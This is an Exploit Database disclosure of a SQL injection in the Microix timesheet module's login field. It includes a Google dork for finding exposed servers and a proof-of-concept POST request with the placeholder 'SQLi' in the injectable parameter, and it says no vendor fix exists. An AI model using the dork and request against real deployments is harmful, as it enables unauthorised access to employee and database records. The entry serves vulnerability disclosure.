Microix Timesheet Module – SQL Injection

• Exploit Database
• 14 阅读

• 作者： Anthony Cole
  日期： 2016-09-22
• 类别：

  • webapps
  平台：

  • aspx
• 来源：https://www.exploit-db.com/exploits/40407/

• # Exploit Title: Microix timesheet module SQL Injection
  # Google Dork: "Copyright by Microix" inurl:"/microixcloud/"
  # Date: 2016-09-06
  # Software Link: http://www.microix.net/workflow-modules/timesheet-module/
  # Exploit Author: Anthony Cole
  # Contact: http://twitter.com/acole76
  # Website: http://www.3fforensics.com/
  # CVE: 
  # Category: webapps
   
  1. Description
   
  Microix timeclock is vulnerable to a SQL injection.The field that is injectable is:
  
  ctl00$ctl00$ASPxCallbackPanel1Root$ASPxSplitter1$Content$ASPxSplitter2$Content2$ASPxRoundPanel1$ASPxCallbackPanel1$txtUserIDOrBadgeID
  
  Initial contact attempt: 08/22/2016
  2nd attempt: 08/29/2016
  3rd attempt: 09/05/2016
  4th attempt: 09/21/2016
   
  2. Proof of Concept
  
  POST /microixcloud/ HTTP/1.1
  Cache-Control: no-cache
  Content-Type: application/x-www-form-urlencoded
  
  __VIEWSTATE=&ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1%24txtUserIDOrBadgeID=SQLi&ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1%24txtPassword=asdsadsad&__CALLBACKID=ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1&__CALLBACKPARAM=c0%3ALogin
  
   
  3. Solution:
  None